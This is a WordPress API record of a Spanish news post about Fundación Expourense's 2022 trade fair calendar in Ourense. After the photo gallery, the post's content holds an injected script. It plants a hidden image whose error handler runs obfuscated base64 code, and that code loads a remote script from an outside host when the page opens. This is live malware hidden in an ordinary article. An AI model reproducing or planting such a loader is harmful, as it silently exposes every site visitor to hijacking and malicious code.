{"id":4949,"date":"2021-12-16T11:09:31","date_gmt":"2021-12-16T14:09:31","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=4949"},"modified":"2025-08-13T16:24:30","modified_gmt":"2025-08-13T19:24:30","slug":"fundacion-expourense-celebrara-en-2022-tres-de-las-seis-ferias-internacionales-de-galicia","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=4949","title":{"rendered":"Fundaci\u00f3n Expourense celebrar\u00e1 en 2022 tres de las seis ferias internacionales de Galicia"},"content":{"rendered":"\n<h4 class=\"wp-block-heading\">Esta ma\u00f1ana ten\u00eda lugar la \u00faltima reuni\u00f3n de 2021 del Patronato de la Fundaci\u00f3n Expourense en la que se aprobaron los presupuestos y el calendario ferial del pr\u00f3ximo a\u00f1o<\/h4>\n\n\n\n<p><a href=\"https:\/\/www.facebook.com\/FUNERGAL\/?__cft__[0]=AZXQ0CZmNBF30ViWwz_p1_Nv4ryVqNKmN4giuA6MGz49V9j84LJKL6S6kH58jtqchU6gOmajd8XbLhRY0gCJ3dgUKjE1iQCbzi6JsQLAaiHl5tb8ycY16OWh_6xP6dZsVGHfE5NsGWM31t3lEgEIQRy7&amp;__tn__=kK-R\">Funergal &#8211; Expourense<\/a>, <a href=\"https:\/\/www.facebook.com\/Termatalia\/?__cft__[0]=AZXQ0CZmNBF30ViWwz_p1_Nv4ryVqNKmN4giuA6MGz49V9j84LJKL6S6kH58jtqchU6gOmajd8XbLhRY0gCJ3dgUKjE1iQCbzi6JsQLAaiHl5tb8ycY16OWh_6xP6dZsVGHfE5NsGWM31t3lEgEIQRy7&amp;__tn__=kK-R\">Termatalia<\/a> y <a href=\"https:\/\/www.facebook.com\/Xantar\/?__cft__[0]=AZXQ0CZmNBF30ViWwz_p1_Nv4ryVqNKmN4giuA6MGz49V9j84LJKL6S6kH58jtqchU6gOmajd8XbLhRY0gCJ3dgUKjE1iQCbzi6JsQLAaiHl5tb8ycY16OWh_6xP6dZsVGHfE5NsGWM31t3lEgEIQRy7&amp;__tn__=kK-R\">XANTAR<\/a> son las tres ferias internacionales que celebrar\u00e1n su primera edici\u00f3n con la conexi\u00f3n de Alta Velocidad a Madrid<\/p>\n\n\n\n<p>Expourense celebrar\u00e1 en 2022 tres ferias internacionales reconocidas por el Gobierno de Espa\u00f1a, que suponen la mitad de las celebradas habitualmente en toda Galicia (y que prev\u00e9n su edici\u00f3n para el pr\u00f3ximo a\u00f1o, ya que el calendario de ferias comerciales internacionales se publicar\u00e1 en el Bolet\u00edn Oficial del Estado en los pr\u00f3ximos d\u00edas). Estas tres citas internacionales de Expourense para el pr\u00f3ximo a\u00f1o son: Funergal (11\u00aa Feria Internacional de Productos y Servicios Funerarios \u2013 19 y 20 de mayo); Termatalia (20\u00aa Feria Internacional de Turismo Termal, de Salud y Bienestar \u2013 29 y 30 de septiembre); y Xantar (23\u00ba Sal\u00f3n Internacional de Turismo Gastron\u00f3mico \u2013 9 a 13 de noviembre).<\/p>\n\n\n\n<p>El calendario de Expourense y el Plan de Actuaci\u00f3n que incluye los presupuestos para 2022 fueron aprobados esta ma\u00f1ana durante la \u00faltima reuni\u00f3n del a\u00f1o Patronato de la Fundaci\u00f3n Expourense en la que participaron representantes de las entidades que lo integran: Xunta de Galicia, Concello de Ourense, Diputaci\u00f3n Provincial de Ourense, ABANCA, Confederaci\u00f3n Empresarial de Ourense-CEO y Concello de San Cibrao das Vi\u00f1as. Esta reuni\u00f3n estuvo dirigida por el Director Xeral de Comercio, Manuel Heredia, por delegaci\u00f3n del presidente del Patronato, el vicepresidente segundo y conselleiro de Econom\u00eda, Empresa e Innovaci\u00f3n de la Xunta de Galicia, Francisco Conde. Asistieron adem\u00e1s el director gerente y la directora de Administraci\u00f3n de Expourense.<\/p>\n\n\n\n<p>El calendario del recinto ourensano se complementa con 7 citas m\u00e1s hasta completar un total de 10 ferias en 2022. A las citas internacionales les acompa\u00f1an otras ferias de car\u00e1cter auton\u00f3mico o peninsular como la Mostra da Oportunidade, Previsel, Car Outlet, Sportur Galicia, Sal\u00f3n del Autom\u00f3vil Nuevo, Sal\u00f3n del Autom\u00f3vil de Ocasi\u00f3n y la Feria de Antig\u00fcedades Antiq Auria. A estas citas hay que sumar adem\u00e1s las competiciones deportivas que vayan a celebrarse en la pista de atletismo instalada en el recinto, una de las mejores de Europa. Entre estas pruebas destaca el LVIII Campeonato de Espa\u00f1a Absoluto de Atletismo en Pista Cubierta que tendr\u00e1 lugar entre el 25 y el 27 de febrero.<\/p>\n\n\n\n<p>Expourense afronta el 2022 con el reto de organizar sus ferias contando por primera vez con la conexi\u00f3n de Alta Velocidad a Madrid que coloca a la ciudad a dos horas y cuarto de la capital de Espa\u00f1a, lo que facilitar\u00e1 la participaci\u00f3n de expositores y participantes en estos eventos. Adem\u00e1s, el hecho de ser el recinto ferial de la puerta de entrada a Galicia y contar con unas instalaciones amplias, modernas y vers\u00e1tiles, reforzar\u00e1n el posicionamiento de Ourense como destino del sector MICE (Meeting, Incentives, Conferencing y Exhibitions), es decir, como el espacio id\u00f3neo para que instituciones y empresas lo elijan para organizar distintos eventos.<\/p>\n\n\n\n<p><a href=\"https:\/\/www.facebook.com\/xuntadegalicia\/?__cft__[0]=AZXQ0CZmNBF30ViWwz_p1_Nv4ryVqNKmN4giuA6MGz49V9j84LJKL6S6kH58jtqchU6gOmajd8XbLhRY0gCJ3dgUKjE1iQCbzi6JsQLAaiHl5tb8ycY16OWh_6xP6dZsVGHfE5NsGWM31t3lEgEIQRy7&amp;__tn__=kK-R\">Xunta de Galicia<\/a><a href=\"https:\/\/www.facebook.com\/OurenseConcello\/?__cft__[0]=AZXQ0CZmNBF30ViWwz_p1_Nv4ryVqNKmN4giuA6MGz49V9j84LJKL6S6kH58jtqchU6gOmajd8XbLhRY0gCJ3dgUKjE1iQCbzi6JsQLAaiHl5tb8ycY16OWh_6xP6dZsVGHfE5NsGWM31t3lEgEIQRy7&amp;__tn__=kK-R\">Concello de Ourense &#8211; oficial<\/a><a href=\"https:\/\/www.facebook.com\/DeputacionOurense\/?__cft__[0]=AZXQ0CZmNBF30ViWwz_p1_Nv4ryVqNKmN4giuA6MGz49V9j84LJKL6S6kH58jtqchU6gOmajd8XbLhRY0gCJ3dgUKjE1iQCbzi6JsQLAaiHl5tb8ycY16OWh_6xP6dZsVGHfE5NsGWM31t3lEgEIQRy7&amp;__tn__=kK-R\">Deputaci\u00f3n de Ourense<\/a><a href=\"https:\/\/www.facebook.com\/ceoourense\/?__cft__[0]=AZXQ0CZmNBF30ViWwz_p1_Nv4ryVqNKmN4giuA6MGz49V9j84LJKL6S6kH58jtqchU6gOmajd8XbLhRY0gCJ3dgUKjE1iQCbzi6JsQLAaiHl5tb8ycY16OWh_6xP6dZsVGHfE5NsGWM31t3lEgEIQRy7&amp;__tn__=kK-R\">Confederaci\u00f3n Empresarial de Ourense<\/a><a href=\"https:\/\/www.facebook.com\/SomosAbanca\/?__cft__[0]=AZXQ0CZmNBF30ViWwz_p1_Nv4ryVqNKmN4giuA6MGz49V9j84LJKL6S6kH58jtqchU6gOmajd8XbLhRY0gCJ3dgUKjE1iQCbzi6JsQLAaiHl5tb8ycY16OWh_6xP6dZsVGHfE5NsGWM31t3lEgEIQRy7&amp;__tn__=kK-R\">ABANCA<\/a><a href=\"https:\/\/www.facebook.com\/concellosancibrao\/?__cft__[0]=AZXQ0CZmNBF30ViWwz_p1_Nv4ryVqNKmN4giuA6MGz49V9j84LJKL6S6kH58jtqchU6gOmajd8XbLhRY0gCJ3dgUKjE1iQCbzi6JsQLAaiHl5tb8ycY16OWh_6xP6dZsVGHfE5NsGWM31t3lEgEIQRy7&amp;__tn__=kK-R\">Concello de San Cibrao das Vi\u00f1as<\/a><\/p>\n\n\n\n<figure class=\"wp-block-gallery columns-2 is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\"><ul class=\"blocks-gallery-grid\"><li class=\"blocks-gallery-item\"><figure><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/12\/266377276_4618070578274426_425439506469977924_n-1024x531.jpg\"><img decoding=\"async\" width=\"1024\" height=\"531\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/12\/266377276_4618070578274426_425439506469977924_n-1024x531.jpg\" alt=\"\" data-id=\"4950\" data-link=\"https:\/\/argentinatermal.com.ar\/?attachment_id=4950\" class=\"wp-image-4950\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/12\/266377276_4618070578274426_425439506469977924_n-1024x531.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/12\/266377276_4618070578274426_425439506469977924_n-300x155.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/12\/266377276_4618070578274426_425439506469977924_n-768x398.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/12\/266377276_4618070578274426_425439506469977924_n-1536x796.jpg 1536w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/12\/266377276_4618070578274426_425439506469977924_n-696x361.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/12\/266377276_4618070578274426_425439506469977924_n-1068x553.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/12\/266377276_4618070578274426_425439506469977924_n-811x420.jpg 811w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/12\/266377276_4618070578274426_425439506469977924_n.jpg 1685w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure><\/li><li class=\"blocks-gallery-item\"><figure><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/12\/267398790_4618070871607730_7220431726911580628_n.jpg\"><img decoding=\"async\" width=\"724\" height=\"1024\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/12\/267398790_4618070871607730_7220431726911580628_n-724x1024.jpg\" alt=\"\" data-id=\"4951\" data-full-url=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/12\/267398790_4618070871607730_7220431726911580628_n.jpg\" data-link=\"https:\/\/argentinatermal.com.ar\/?attachment_id=4951\" class=\"wp-image-4951\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/12\/267398790_4618070871607730_7220431726911580628_n-724x1024.jpg 724w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/12\/267398790_4618070871607730_7220431726911580628_n-212x300.jpg 212w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/12\/267398790_4618070871607730_7220431726911580628_n-768x1086.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/12\/267398790_4618070871607730_7220431726911580628_n-1086x1536.jpg 1086w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/12\/267398790_4618070871607730_7220431726911580628_n-696x985.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/12\/267398790_4618070871607730_7220431726911580628_n-1068x1511.jpg 1068w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/12\/267398790_4618070871607730_7220431726911580628_n-297x420.jpg 297w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/12\/267398790_4618070871607730_7220431726911580628_n.jpg 1240w\" sizes=\"(max-width: 724px) 100vw, 724px\" \/><\/a><\/figure><\/li><\/ul><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Esta ma\u00f1ana ten\u00eda lugar la \u00faltima reuni\u00f3n de 2021 del Patronato de la Fundaci\u00f3n Expourense en la que se aprobaron los presupuestos y el calendario ferial del pr\u00f3ximo a\u00f1o Funergal &#8211; Expourense, Termatalia y XANTAR son las tres ferias internacionales que celebrar\u00e1n su primera edici\u00f3n con la conexi\u00f3n de Alta Velocidad a Madrid Expourense celebrar\u00e1 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":4950,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[31],"tags":[],"class_list":["post-4949","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-colaboradores"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4949","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4949"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4949\/revisions"}],"predecessor-version":[{"id":10734,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4949\/revisions\/10734"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4950"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4949"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4949"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4949"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}